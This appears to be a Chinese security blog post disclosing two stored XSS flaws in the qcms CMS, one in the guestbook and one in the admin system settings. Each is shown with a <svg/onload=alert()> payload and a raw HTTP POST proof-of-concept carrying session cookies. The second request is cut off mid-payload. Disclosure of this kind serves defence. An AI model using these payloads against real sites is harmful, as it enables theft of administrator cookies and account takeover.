第一处
攻击者可以获得管理员的cookie
<svg/onload=alert(qcms)>
POC
POST /guest/index.html HTTP/1.1 Host: localhost Content-Length: 92 Cache-Control: max-age=0 Origin: http://localhost Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 DNT: 1 Referer: http://localhost/guest/index.html Accept-Language: zh-CN,zh;q=0.9 Cookie: SESS49960de5880e8c687434170f6476605b=KyZyx79ethBmvgssXcM6DUdjHnnYxkfiw-86SorC64c; ly_main_nav_limit=15; lang=zh-cn; theme=default; bdshare_firstime=1519799317252; Connection: close title=%3Csvg%2Fonload%3Dalert%28%27qcms%27%29%3E&name=test&email=test%40test.t&content=test
第二处
<svg/onload=alert(0)>
POST /backend/system.html HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: http://localhost/backend/system.html Content-Type: application/x-www-form-urlencoded Content-Length: 40 Cookie: PHPSESSID=8sqolv5pb9kfljuh5g0b36tus6; admin_id=1; admin_level=1; admin_name=admin; admin_secret=f63fad88029cf8f923c35fafe1c6b5d1; UM_distinctid=162181544af9-0ca6b89389a11d8-4c322172-1fa400-162181544b04ce; Connection: close Upgrade-Insecure-Requests: 1 webname=%3Csvg%2Fonload%3Dalert%280%29%3
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论